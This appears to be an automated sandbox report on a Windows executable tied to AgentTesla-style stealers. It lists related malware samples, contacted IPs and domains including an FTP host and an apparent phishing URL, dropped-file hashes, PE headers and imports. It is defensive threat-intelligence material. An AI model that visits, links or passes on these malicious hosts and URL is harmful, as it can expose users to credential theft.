                                            2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              Eemw0Iqp2J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                b83NG35487.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    s-part-0017.t-0009.t-msedge.netYv24LkKBY6.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.246.45
                                                    11626244731900027402.jsGet hashmaliciousStrela DownloaderBrowse
                                                    • 13.107.246.45
                                                    QQpQgSYkjW.exeGet hashmaliciousFormBookBrowse
                                                    • 13.107.246.45
                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 13.107.246.45
                                                    1r3DRyrX0T.exeGet hashmaliciousDarkWatchmanBrowse
                                                    • 13.107.246.45
                                                    TBUjHBNHaD.exeGet hashmaliciousDarkWatchmanBrowse
                                                    • 13.107.246.45
                                                    S7s4XhcN1G.exeGet hashmaliciousDarkWatchmanBrowse
                                                    • 13.107.246.45
                                                    6043249381237528594.jsGet hashmaliciousStrela DownloaderBrowse
                                                    • 13.107.246.45
                                                    247624346306918832.jsGet hashmaliciousStrela DownloaderBrowse
                                                    • 13.107.246.45
                                                    https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                    • 13.107.246.45
                                                    ip-api.comaik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                    • 208.95.112.1
                                                    DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                    • 208.95.112.1
                                                    tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    toIuQILmr1.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    LfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    ftp.jeepcommerce.rsjuE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 195.252.110.253
                                                    J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 195.252.110.253
                                                    doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 195.252.110.253
                                                    2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    Eemw0Iqp2J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    b83NG35487.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    TUT-ASUSaik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                    • 208.95.112.1
                                                    DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                    • 208.95.112.1
                                                    tb4B9ni6vl.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    juE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 208.95.112.1
                                                    YY3k9rjxpY.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    toIuQILmr1.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    LfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.95.112.1
                                                    BEOTEL-AShttpwwwbeotelnetRSjuE8dtqPkx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 195.252.110.253
                                                    J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 195.252.110.253
                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                    • 194.106.175.134
                                                    DEMONS.arm.elfGet hashmaliciousUnknownBrowse
                                                    • 62.108.98.189
                                                    doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 195.252.110.253
                                                    bot.x86.elfGet hashmaliciousMiraiBrowse
                                                    • 62.108.98.135
                                                    bot.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 62.108.98.187
                                                    jade.arm.elfGet hashmaliciousMiraiBrowse
                                                    • 62.108.98.145
                                                    No context
                                                    No context
                                                    Process:C:\Users\user\Desktop\4287eV6mBc.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):142136
                                                    Entropy (8bit):7.923310358431667
                                                    Encrypted:false
                                                    SSDEEP:3072:YMGKIK9yjFxRCYUqoQ93W6Io9YWxkRAhZ5DSjiEFoJ:Y8Exb/BWbWHhZRS++oJ
                                                    MD5:565EFEA62DB6A42092205A82E3A121CB
                                                    SHA1:F9EB0058B57BE7DA7F338997A13D1B59304582C4
                                                    SHA-256:4E67B3152F57A5C57276B7580F34295DE81B65C673E1F3444B109AB5D81C519C
                                                    SHA-512:D2494279E8DE37A29EA22B84DF0911110AD8D13ADC25110593718AA206E2891BDEDB2220045F1AD5A878D1EF021D00FAC9FEAA72E8A9C144DA468E14BAAC983B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:EA06......;3z}..O.T.3-..oL.........(..y....|P...N.Q)8:.".....8.?...y...'..%...r...S....;.."....IX.H/.).b.......Q.R.Sx%.E*.X..M..j..U'..4Q.....Q.T...Y.....*|...,R.....~i..Z.S.3zp.^&..N.E.S.. .&N....5..n..j.rp...U....Qk.!..._.l.....0.. @.=...3.0.Ye.R@.*~2.Q.R..~.-J.X.H.3.P....... ...Bc. ...*.7.Z.....e2.Q@....`.B|(.._..Q..X|t,..........^.~.R....N..,.............k....Pj..k...e|J...A.`.z{...G.P.....:.......I4..&..U....6...vs..R.5=..%...$....u...h.m.c...x-.9.&....<./.k74..$T;.Z#..c-..V.i..S!..On{....(..CB.K#1.$.]J..&..@...dpy..;C%..b.Z.zY~...^....f...->..,..&........h.P..F..U.7....;..".c.....@...XZ...`.a.Wh.o..9.r.B+>.oz...n$C.e.x..6Jw...0..L..|......vs...p....N.....OC..l.Z..L...5......l.ju..J.Uj..5.s....q...g..lr.y.....R;.P.lkj3.P.....,.U'n...*].m+.7..z\..J.\...r.,.A..M(2Y-.Se.F.+..q&....0..f4Jh.[O.X.Sze>...*3*v.E\......E.Y.5*.fo..{/...q2.P.R.-J.:.P...;wT..*Uz..aJ.L...YH.P...,j.R..@..|b.H.Tg..L.E..x.:?2.c..&.*|....Rm...L.X..,S..B.O.T*6...l.,YoT.,j...
                                                    Process:C:\Users\user\Desktop\4287eV6mBc.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):245248
                                                    Entropy (8bit):6.541972303280438
                                                    Encrypted:false
                                                    SSDEEP:6144:bpah3LM+ckA3NsBM/WXwkWsior4+UaT+Qo76uv/tu48s:tePONqL3drU0+Qo7pv/cVs
                                                    MD5:A584D98E7CD8007112D08DDB1A1B07B5
                                                    SHA1:5F24E238C53F319E66D34E07B081935201CAC0BB
                                                    SHA-256:779FF76D3C36D25F1DC8A39F15E4C4F285BFBEC3F65E9E44752A49AC9D0E18D5
                                                    SHA-512:74FFAB3159B48C36CF20A76E7A52DDBF6CF28E8E799CEE216909C535E0D85D1A78EC9507FE93AD5F06533EC20B35E7F2B854841B8C25AD9DAF54BEC466AF40DF
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...7OERO<RQ2..7L.RO8RQ2J.7LERO8RQ2JI7LERO8RQ2JI7LERO8RQ2JI7L.RO8\N.DI.E.s.9....!^?e"=W5#S'iT-+< Lr3Wj;B"e;!...aj$X( |B5Xu2JI7LER.}RQ~KJ7.m.*8RQ2JI7L.RM9YP9JI.OERG8RQ2JI..FRO.RQ2.J7LE.O8rQ2JK7LARO8RQ2JM7LERO8RQ.NI7NERO8RQ0J..LEBO8BQ2JI'LEBO8RQ2JY7LERO8RQ2JI.FR.8RQ2.J7.@RO8RQ2JI7LERO8RQ2JI7HE^O8RQ2JI7LERO8RQ2JI7LERO8RQ2JI7LERO8RQ2JI7LERO8RQ2JI7lERG8RQ2JI7LERO0rQ2.I7LERO8RQ2JgC)=&O8Re.II7lERO.QQ2HI7LERO8RQ2JI7LeROX|#A8*7LE.J8RQ.II7JERO.QQ2JI7LERO8RQ2.I7.k *T=22JE7LERO<RQ0JI7.FRO8RQ2JI7LEROxRQpJI7LERO8RQ2JI7LEB.;RQ2JI.LERM8WQ~.K7.pSO;RQ2KI7JERO8RQ2JI7LERO8RQ2JI7LERO8RQ2JI7LERO8RQ2JI7LERO8O......{.2.X35.o.+.Q..A.3.xC.G.CF....:....u$4..7.Jb.X....9.ZJAS....t%Y>6:.EeFV.X..d.l.>.|.C<.B..4{."Cv....lj...@L....=..&=".3!B&,..$4.J;.0.H7LER......%=...Q^,~[O....fCJ...,O8R52JIELER.8RQuJI7#EROVRQ24I7L;RO8.Q2J.7LEeO8Rt2JIZLERk8RQLJI7.8]@..[9..LERO8g..z.Z.....e...F.;.-......|..W..]9.=.{...A..:~.^e'Cq.`UP4NL5KAQC.\....NAVJ:UU1Ft9......w..p...#..H.57LERO8.Q2.I7L..O.RQ2.I.L..O8R..J.7.E..R
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.023237097080476
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:4287eV6mBc.exe
                                                    File size:1'072'128 bytes
                                                    MD5:edb2e2cea8df699849675ccf5f9b12b4
                                                    SHA1:a5eb63f4ad859b4925ca9f6a7511c13201387256
                                                    SHA256:06f6eccac99f9be344bfba51fbccb827405551767d00224ef06c2e2f525f95af
                                                    SHA512:3e0181f68c6a6881d18ffb79938672d0c2e948e4931332481072d18cf67ea29ce3d89976a1277a4ab21c32e6913043af1bbeba8bcbcebcb93cd615e6164361f8
                                                    SSDEEP:24576:qu6J33O0c+JY5UZ+XC0kGso6FaX4pSSSoiPGHDBWY:cu0c++OCvkGs9FaX1SNiPGYY
                                                    TLSH:6F35BE2273DDC361CB669173BF6AB7056EBF3C214630B85B2F980D7DA950162122D7A3
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                    Icon Hash:aaf3e3e3938382a0
                                                    Entrypoint:0x427dcd
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6750E502 [Wed Dec 4 23:25:54 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                    Instruction
                                                    call 00007FF461170FFAh
                                                    jmp 00007FF461163DC4h
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    push edi
                                                    push esi
                                                    mov esi, dword ptr [esp+10h]
                                                    mov ecx, dword ptr [esp+14h]
                                                    mov edi, dword ptr [esp+0Ch]
                                                    mov eax, ecx
                                                    mov edx, ecx
                                                    add eax, esi
                                                    cmp edi, esi
                                                    jbe 00007FF461163F4Ah
                                                    cmp edi, eax
                                                    jc 00007FF4611642AEh
                                                    bt dword ptr [004C31FCh], 01h
                                                    jnc 00007FF461163F49h
                                                    rep movsb
                                                    jmp 00007FF46116425Ch
                                                    cmp ecx, 00000080h
                                                    jc 00007FF461164114h
                                                    mov eax, edi
                                                    xor eax, esi
                                                    test eax, 0000000Fh
                                                    jne 00007FF461163F50h
                                                    bt dword ptr [004BE324h], 01h
                                                    jc 00007FF461164420h
                                                    bt dword ptr [004C31FCh], 00000000h
                                                    jnc 00007FF4611640EDh
                                                    test edi, 00000003h
                                                    jne 00007FF4611640FEh
                                                    test esi, 00000003h
                                                    jne 00007FF4611640DDh
                                                    bt edi, 02h
                                                    jnc 00007FF461163F4Fh
                                                    mov eax, dword ptr [esi]
                                                    sub ecx, 04h
                                                    lea esi, dword ptr [esi+04h]
                                                    mov dword ptr [edi], eax
                                                    lea edi, dword ptr [edi+04h]
                                                    bt edi, 03h
                                                    jnc 00007FF461163F53h
                                                    movq xmm1, qword ptr [esi]
                                                    sub ecx, 08h
                                                    lea esi, dword ptr [esi+08h]
                                                    movq qword ptr [edi], xmm1
                                                    lea edi, dword ptr [edi+08h]
                                                    test esi, 00000007h
                                                    je 00007FF461163FA5h
                                                    bt esi, 03h
                                                    jnc 00007FF461163FF8h
                                                    Programming Language:
                                                    • [ASM] VS2013 build 21005
                                                    • [ C ] VS2013 build 21005
                                                    • [C++] VS2013 build 21005
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ASM] VS2013 UPD4 build 31101
                                                    • [RES] VS2013 build 21005
                                                    • [LNK] VS2013 UPD4 build 31101
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x3d3a4.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1050000x711c.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xc70000x3d3a40x3d4003c5fe37d73bdc6b2cc7b061101a8cc28False0.893148118622449data7.809730065391068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x1050000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                    RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                    RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                    RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                    RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                    RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                    RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                    RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                    RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                    RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                    RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                    RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                    RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                    RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                    RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                    RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                    RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                    RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                    RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                    RT_RCDATA0xcf7b80x34669data1.0003540928002683
                                                    RT_GROUP_ICON0x103e240x76dataEnglishGreat Britain0.6610169491525424
                                                    RT_GROUP_ICON0x103e9c0x14dataEnglishGreat Britain1.25
                                                    RT_GROUP_ICON0x103eb00x14dataEnglishGreat Britain1.15
                                                    RT_GROUP_ICON0x103ec40x14dataEnglishGreat Britain1.25
                                                    RT_VERSION0x103ed80xdcdataEnglishGreat Britain0.6181818181818182
                                                    RT_MANIFEST0x103fb40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                    DLLImport
                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                    PSAPI.DLLGetProcessMemoryInfo
                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                    UxTheme.dllIsThemeActive
                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
